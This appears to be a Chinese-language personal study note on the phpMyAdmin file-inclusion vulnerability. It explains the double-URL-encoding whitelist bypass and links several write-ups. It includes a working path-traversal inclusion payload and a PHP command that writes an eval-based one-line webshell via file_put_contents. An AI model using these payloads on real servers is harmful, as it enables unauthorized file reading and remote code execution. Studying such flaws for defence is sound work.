phpMyAdmin后台文件包含溯源

先上大佬解释的漏洞原理链接

https://mp.weixin.qq.com/s?__biz=MzIzMTc1MjExOQ==&mid=2247485036&idx=1&sn=8e9647906c5d94f72564dec5bc51a2ab&chksm=e89e2eb4dfe9a7a28bff2efebb5b2723782dab660acff074c3f18c9e7dca924abdf3da618fb4&mpshare=1&scene=1&srcid=0621gAv1FMtrgoahD01psMZr&pass_ticket=LqhRfckPxAVG2dF%2FjxV%2F9%2FcEb5pShRgewJe%2FttJn2gIlIyGF%2FbsgGmzcbsV%2BLmMK#rd

不光可以通过本身存在的包含漏洞，还能再mysql中直接写入一句话木马，然后解析连接

 

当时原理一直没看到最后一步的payload: db_sql.php%253f/../../../../../../windows/system.ini  问了很多人，搞不懂db_sql.php？这个东西，今天偶然看到一个WP，发现了。emmmmmmmmm，SO噶，解决了那天看了一晚上也没懂这个细节的。代码审计简单，这个晕死了。 算个小trick? 附上链接(https://www.jianshu.com/p/8f5ba751aa0f)

 

 看来我要在ubuntu下也搭个环境，方便测试。这个trick问了好多好多人，给我的答复没有讲到这个细节，都认识我是代码审计有问题。。。。。。。然而我在意的就是这个小细节，可能大佬们把这个作为常识 0-0，恕我直言，我太垃圾。 。继续加油

php中，url中带?的会被解析为参数而不是路径，双重编码，第一次会自动解码一回，呢么就饶过了php对url的解释，第二次解码后，绕过了白名单验证。

include的target应该是include 'db_sql.php%3f/../../../../../../windows/system.ini'   在include中,%3f会被当作是路径(反正能include到最后的文件就完事了)

其次如果包含的是一句话木马的话，传入 include target=././././123.txt?a=phpinfo()会爆错，因为php会把?解释为传参而不是路径，而include会认为那是路径

所以用& 代替 ?

有时候菜刀连不了一句话的话，可以用a= $a='<?php @eval($_POST[\'a\'])?>'; file_put_contents('xxx.php'.$a); echo 'ok' ;

利用小马中eval的特性，可以直接当作正常的php执行

 

 

 

https://www.cnblogs.com/bmjoker/p/9897436.html写的非常完整。

https://www.jianshu.com/p/0d75017c154f更详细的原理

https://www.jianshu.com/p/73ca8146af04 我最能理解的一个